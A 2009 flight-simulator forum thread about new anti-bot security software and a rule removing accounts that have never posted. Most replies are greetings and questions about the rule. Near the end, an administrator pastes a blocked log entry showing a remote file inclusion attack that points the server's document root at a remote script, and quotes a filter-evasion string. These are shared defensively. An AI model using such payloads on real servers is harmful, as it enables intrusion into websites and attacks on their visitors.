PDA

View Full Version : Security Measures

Jagdflieger
December 1st, 2009, 02:57
The Outhouse has installed new security software. If you lurk, but don't post, your account will disappear in a week. To prevent this, go to the following link and post a quick "Hello."

http://www.sim-outhouse.com/sohforums/showthread.php?t=26832

You can also post here too.

By doing so, your account will remain active.

PomBee
December 1st, 2009, 03:03
A sound idea, guys. Let's hope that it'll stop any future nastieness.

Cheers.

PomBee.:ernae:

watchdog22
December 1st, 2009, 03:52
I'm on board with that idea :applause:

bobhegf
December 1st, 2009, 04:14
Hello

Rami
December 1st, 2009, 04:23
Well, I guess this leaves me in the clear. I'm not the silent type. :icon_lol:

kelticheart
December 1st, 2009, 04:57
A sound idea, guys. Let's hope that it'll stop any future nastieness.

Cheers.

PomBee.:ernae:

Hear! Hear!

I fully agree with it!

Cheers!
KH :ernae:

wolfi
December 1st, 2009, 04:58
Better save! :applause: But what if you are on vacation?

PJMack
December 1st, 2009, 05:38
I'm in. I hope that this makes the Outhouse safe and continues to be as enjoyable.:wavey:

bub
December 1st, 2009, 06:02
Sorry, got carried away. Hello, and have a wonderful Holiday Season.

Bub

Boatz
December 1st, 2009, 06:09
Hey!

B757
December 1st, 2009, 06:55
Hi there!

rohan
December 1st, 2009, 07:25
hello

Ajax
December 1st, 2009, 09:54
Hi guys !

skylane
December 1st, 2009, 10:11
Hello!
Hope this helps to keep the bad guys from doing any more harm!

hewman100
December 1st, 2009, 11:06
Makes good sense to me!:jump:

Nole
December 1st, 2009, 11:41
Merry Christmas!

Bill Kestell
December 1st, 2009, 13:41
:kilroy:I ate waaaaaaay toooooo much Turkey and other junk! Hope you folks did too!:isadizzy:

Ravenna
December 1st, 2009, 14:04
Good idea, but I second Morton's concern.:ernae:

Devildog73
December 1st, 2009, 14:29
B-B-B-But how did onnogras get my photo?:bump:

Skipsan
December 1st, 2009, 14:30
And if one is off on vacation for a few week's then what? You go to the back of the line loose all recognition for you contribution and start over? Or is there a contingency in place for a sabbatical?

Somewhat disgruntled

Skipsan :kilroy:

Grinseed
December 1st, 2009, 20:05
Hello

Hern07
December 1st, 2009, 20:19
Still here, a quick belated atta boy(s) for the usn, usmc and us army for November 1942 at Guadalcanal. :ernae:

Blue Devil
December 1st, 2009, 21:39
Post.

There, ...now I've gone and done it.

Stirlitz
December 1st, 2009, 21:46
Hello!

OBIO
December 1st, 2009, 22:52
This security measure will only affect those accounts/members who have not made at least one post. At one time, back when I first joined Combatfs in the dark days of CFS3, there was a "requirement" that you had to make a post after having your account activated and a thread up in the sticky area just for doing those initial posts.

There are 12,000 accounts that do not have a single post accredited to them...and this security patch will remove those accounts as a precaution against nasties lurking about.

OBIO

Strafing_run
December 2nd, 2009, 02:09
G'day :wavey:

Discus
December 2nd, 2009, 02:29
Better save! :applause: But what if you are on vacation?

Safety firts!! But what if whe are away from a computer for more than a week. Will we have peace of mind :engel016:or be troubled :frown:for the chance of loosing our connection to these treasure post:isadizzy:

Cheers, Discus

Shessi
December 2nd, 2009, 03:38
Jagd,
I take it if you end up missing the time limit and therefore getting block, it will be a simple process of re-enabling the account?

e.g. Holiday, sickness, work commitments away from home/pc etc etc

Cheers Shessi

sc7500
December 2nd, 2009, 08:27
Okay - even tho I'm on here FAR more than I should [and post almost daily], I'll make it official.

Post Post Post !

The posting requirement doesn't apply strictly to THIS thread, right ?
SC
:kilroy:

CrisGer
December 2nd, 2009, 09:02
um, so by lurking does this mean stay on line or just not post? it seems a bit harsh if one does not post daily or often, to lose ones account. HOpefuly you mean people who are ON line and lurk. can someone clarify?

bretnutz
December 2nd, 2009, 09:11
I'm in...... I can't lose this site.....I.m still rebuilding my many CFS2's...

cpljacko
December 2nd, 2009, 09:31
Are we obliged to post something once a week then?

SPman
December 2nd, 2009, 16:09
Not according to Obi - as long as you have posted, you are in......

miamieagle
December 2nd, 2009, 16:22
Kool with me!

Larry S. Wright
December 2nd, 2009, 16:53
I just can't imagine not being able to access my favoritist, most favorist, more favorableist, favorableist of all website. Hello!:wavey: PS: Thanks guys (all of you) for making CFS2 such a fantastic, realistic world!

miamieagle
December 2nd, 2009, 17:32
Hey Jag, I have question? What about if we get sick or go on a Vacation after our last post. Perhaps our PC breakdown. Will we be penalise for that?

miamieagle
December 2nd, 2009, 17:42
Another question?

You wrote "Account will disappear in a week. To prevent this, go to the following link and post a quick "Hello."

Can we reactivate our account if we have not been able to post after week from our last post?

miamieagle
December 2nd, 2009, 17:56
I'am sorry but I have another question. I have not seen this warnning in any of the other forum. Is this the only forum with this new security rules.

Thank you for the Information Jag!

I just want a clear clarification of the new forum rules!:applause:

PJMack
December 2nd, 2009, 19:10
I have another question...is therte a limit on the amount of questions we can ask before being replied to? LOL just kidding Miami!:ernae:

dhasdell
December 2nd, 2009, 20:31
:wavey:

miamieagle
December 2nd, 2009, 20:43
Thats alright! LoL

Typhoon Willy
December 3rd, 2009, 02:14
Hello

trasno
December 3rd, 2009, 02:41
Yesterday, when I tried to login, I received a very wird message, that said that I was guilty of bad behavour (?) and my IP was being send to a honeypot (?). But today I managed to login without problems... I became very sacared, because I thought that a hacker was using my computer to attack the sim-outhouse.

Trasno

JapLance
December 3rd, 2009, 04:20
Yesterday, when I tried to login, I received a very wird message, that said that I was guilty of bad behavour (?) and my IP was being send to a honeypot (?). But today I managed to login without problems... I became very sacared, because I thought that a hacker was using my computer to attack the sim-outhouse.

Trasno

I've had the same experience since Tuesday morning, and my feelings were the same... Since then, I only had a 503 error screen. This morning I could at least get to the main page, through a proxy, and found I had been banned. I could send a message to the administrstors through the system,and for what it seems it paid off :applause:.

BTW, Hello :bump:

sc7500
December 3rd, 2009, 08:31
... And this has absolutely NOTHING to do with Ickie's work...

But my laptop suffered a HUMONGOUS Worm infestation last night - got past 3 layers of anit-malware before Avast stopped it

A 6 hour (overnight) virus check killed 145 infected files, and I'm in the process of rebuilding what can't be used with new files.

Beware the Win.32:Delf-MZG {Tri} Worm, Mates !

Don't know whence it derived, but it ain't on here anymore !

SC
:kilroy:

Skipsan
December 3rd, 2009, 08:47
A bit redundant here? My week is up I'm on vacation say for 6 week's, when I come home and try to log back on I'll be in the "s-can" is this correct?

Must I then reapply to SOH a totally new-be? My contribution efforts are in the "s-can" as well? With no residual history of me @ SOH so-on and so-forth?

Now must I just simple apply, becoming the new kid on the block "starting allover again for the "x" time"?

mariereid
December 3rd, 2009, 09:21
I think all you have to do is make one post. There are guys who never post, and I think they are the ones who have to make at least one post. Santa's helper looks pretty good up there!

Pips
December 3rd, 2009, 12:10
Sound idea. Anything that helps protect this Forum is fine by me. :)

erufle
December 3rd, 2009, 23:01
O.K. Hello! Again!

mcspeed
December 4th, 2009, 07:44
Well got to stay active... Merry Christmas :ernae:

Shadow Wolf 07
December 4th, 2009, 13:38
Just in case, I am logging in on my second computer :ernae:

Jagdflieger
December 4th, 2009, 14:13
One post is all that is needed. Most of you accomplish that every day. This is really just for those who visit but don't post.

egypt23spitfire
December 5th, 2009, 02:10
...........................its a bit painful:isadizzy:
when you see the download figures for some things, compared to the THANX posts (which might get, say 25 thankyous) Looks pretty crummy, seeing that hundreds are downloading some files

...we are a fraternity, and a respectful one too(pretty rare on the www) so i agree
.it takes not much time to post and have your say:engel016:

mariereid
December 5th, 2009, 04:46
You are right, egypt. That's how I started at SOH. Downloading tons of stuff. I promised myself that I would make a donation, as soon as I got a download to install. I was a complete pc and cfs2 virgin. I am still pretty fresh, but I am learning some tricks from the pros. For the guys that never bother checking the cfs2 forum, you are missing the best part of the site. The guys here are great, and willing to help. Don't be afraid to ask questions. You can get tons of info, just by reading the posts. I believe most of the guys that have made this sim so good, are right here at SOH.

CrashnBurns
December 5th, 2009, 07:57
Testing, testing, 1, 2, 3

Ickie
December 5th, 2009, 08:19
I also installed software which keeps out bots, spammer ISP's and bad ISP's, it also scans incoming connections and if it detects bots/trogans/viruses which spreads to other IP's, it will not let you in. Nor will I.
2 of our members were caught with bad trogans and did not know it until they seen my page and it told them what they had and where to go to remove it. I than told them my favorate online scanner and they did and even found more viruses.
This is to protect you.
I have been working 1 on 1 with people to get them back here at SOH,
The internet is full of bad ISP's and some of you are their customers.
The messages you have received in the 403 error page, are intended to tell you of your bad ISP. I did not make these messages but I think they get the point out, lol. I am working with the writter of this software to streamline this for future customers. This is the newest thing and soon you will see it everywhere on all forums. This does keep out them hackers and prevents them from altering our pages.....

Skipsan
December 5th, 2009, 08:52
Thank you Ickie for the explanation and your efforts :applause::applause::applause::applause::applause:

An explanation on what one is to encounter does help one to coupe with an work with or around the issue :isadizzy:

All one can hope for is an explanation to deal with the problem :USA-flag: [no interactive banana's]

tonybones2112
December 5th, 2009, 09:00
The Outhouse has installed new security software. If you lurk, but don't post, your account will disappear in a week. To prevent this, go to the following link and post a quick "Hello."

http://www.sim-outhouse.com/sohforums/showthread.php?t=26832

You can also post here too.

By doing so, your account will remain active.

Jagd, I'm on board with any measures you initiate for security.

Bonesimoto

CrisGer
December 5th, 2009, 09:17
ah, this makes much sense now, thanks for the effort and for the saftey for us all, much appreciatd Ickie;)

Ickie
December 5th, 2009, 09:25
These new attack bots are something else, they try everything to get by and attack your IP here is a snippet from the programmer.

This is a thanks to Ron Larson, I saw the attack on his board where they tried (unsuccessfully) to split the signature with an uprintable ASCII like this... "=%0Dhttp:" well, the way to fix this was to remove the "=".

as you see they add special characters to fool the system

I want SOH to be a safe place to visit.

Ickie
December 5th, 2009, 09:34
This is from my logs this morning, this is a bot trying to infect our root to attack you with a popup

#: 162 @: Sat, 05 Dec 2009 09:31:08 -0500
Host: ip-174-142-120-148.static.privatedns.com
IP: 174.142.120.148
Score: 7
Why blocked: Question mark at end of query. Badly formed query, must not have 2 question marks in a row. RFI (http). Root hack. Nesting attack. No www site, and several attacks. Bothost and/or Server Farm. .
Query: _SERVER[DOCUMENT_ROOT]=http://www. beijingteacher. net/test/fid1.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// www.our site /our forums///?_SERVER[DOCUMENT_ROOT]=http://www. beijingteacher. net/test/fid1.txt??

dhasdell
December 5th, 2009, 12:07
Thanks again for all the work Ickie. I see another poster was in Spain, same as me. Has that been a bad area? Is it Telefonica?

HighGround22
December 5th, 2009, 13:49
Yes, many thanks for your devotion to service, Ickie! We realize it's no walk in the park, keeping the bad *******s at bay (Ooh. Howzat for alliteration?).

Cheers and all the best, Ickie!

OTTO
December 6th, 2009, 04:19
Any thing to keep SOH safe & running is fine with me !
" Thanks " to all of you guys for your hard work !

" Happy Holidays" to all
OTTO :salute:

wahoo
December 7th, 2009, 14:53
Like so many, " Thanks " for all the hard work! I don't often have much to offer to the conversations but would miss them. Thank you again for the efforts. wahoo

Skyblazer100
December 7th, 2009, 15:09
Hi guys, sorry that I am mostly a reader and not a contributor, but thank you for the wonderful work you do, I have benefitted so much!
Merry Christmas!

erafitti
December 7th, 2009, 22:07
Thanks for the effort (gracias por el esfuerzo).

DOMINIC
December 10th, 2009, 07:23
Hello all!

:jump::ernae::applause:

wolfi
December 10th, 2009, 09:23
One post is all that is needed. Most of you accomplish that every day. This is really just for those who visit but don't post.

ah, thanks for that information.

wolfi

Scandic
December 11th, 2009, 06:18
Hi, again.